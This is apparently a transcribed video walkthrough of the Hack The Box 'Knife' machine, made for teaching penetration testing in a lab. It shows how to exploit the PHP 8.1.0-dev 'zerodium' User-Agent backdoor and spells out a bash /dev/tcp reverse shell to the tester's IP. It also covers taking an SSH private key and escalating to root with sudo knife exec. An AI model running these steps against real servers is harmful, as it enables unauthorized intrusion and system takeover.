All right, so I want to try another one with you. Knife is one of the more simple boxes on HTB, and it's become considerably simpler since it was first released. I want to begin with a web server that doesn't host many websites, but's leaking the fact that it's running a development version of PHP. Okay, so when the PHP development servers were breached in March of 2021, a backdoor was accidentally added to this version. Oops. So first, I'll start by port scanning. So again, we're going to write nmap-sc-sv and the target IP address. Now, Nmap's going to look at every port. And as you can see, we've got a couple of open ports, and we've got 80, of course, so let's check the website. So if we look for some source code, we can see many JavaScript codes in the background. So I would like to find out what the extension for the server is. It's not HTML. Ah, okay. Did you find it? It's PHP. So I'm wondering what is the header of the website. So I want to run CURL for this. Now, if you write curl-help, it'll give you some suggestions on how you can use it. I'm going to use the I parameter. So curl-I and the target website address. So as you can see, we've got the header. Now, I believe in this version, there is an exploit about remote code execution. So if you write the version, yeah, you can see there's a remote code execution. So we're going to go along this way. We can find some more information about this vulnerability. PHP version 8.1.0-dev was released with a backdoor on March 28, 2021, where 2 malicious commits were pushed to the PHP source repo. But the backdoor was quickly discovered and removed. So the exploit has a reference to a git commit, which explains the backdoor functionality. The code checks the first occurrence of the Zerodium string in user agent request header. If found, it's going to execute the code after that string. Now, just like we did on the devel box, we should set a listener on port 80 and verify this by sending a CURL request to our port 80. And this time, though, we're going to use nc-lvnp to listen to port 80. Now I'm going to open up Burp Suite and go to Proxy tab, open Burp Browser. Go to the target IP address, and this time I'm going to open the terminal and write nc-lvnp80. Okay. Now we're going to need to change the user agent. And you change the user agent with one more T at the end of the agent. All right, you keeping up? And we're going to write Zerodium system, parentheses, single quote, /usr/bin/curl and your IP address. Close out the single quote, close out the parentheses, and hit forward. And as you can see, we got the request back. So why don't we go ahead and open a reverse shell? Here I'm going to write bash dash C, single quote, bash dash I, right angle bracket, ampersand slash dev slash TCP slash 10.10.14.12, which is my IP address, and slash 9001 0, right angle bracket, ampersand 1, single quote, double quote, close parentheses. So I'm going to be using this port 9001. So open the terminal and write nc-lvnp 9001, hit enter, and forward the request on Burp Suite. All right, so there we go. We got our connection. Now write Python 3-c, single quote, import pty, semicolon, pty.spawn, open parenthesis, double quote, bin slash bash, close double quote, close parenthesis, close single quote. You still with me? So write ls-al to see all files. Now we can go to /home and we've got user text in James folder, also the SSH folder. So we can use ID RSA and SSH opened with a cat command and copy the SSH. Okay, so this is not authorized key. So we need to move the ID RSA pub to authorized keys. Yeah. Okay. Now open a new terminal. And write sudo nano ID underscore RSA. Paste the code. Now write sudo ssh-i ID underscore RSA James at 10.10.10.242 and hit enter. Okay. And as you can see, we've connected machines via SSH. Look at sudo. We can run knife with sudo. So write man knife. Oh, nothing comes up? But don't panic because Knife is actually a command line tool that provides an interface between a local Chef repo and the Chef infra server. All right, so if there is no man page, we got GTFO bins. GTFO bins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. So you got to go to the GTFO bins and write knife, click sudo, and here it is with sudo knife exec. We become root. Bada boom, bada bing. And here is the root text. So in this course, we have not shown you how to enter the flag, but we can explain how you can do that. But I do want to drop you a quick reminder. In this text file, there are flags. You need to copy the flag, and you'll come to a box page, and you'll hit Submit Flag. And that's pretty much all you need to do. So there's a bunch of great things to get you started. And now you know how to use Hack the Box. Have some fun.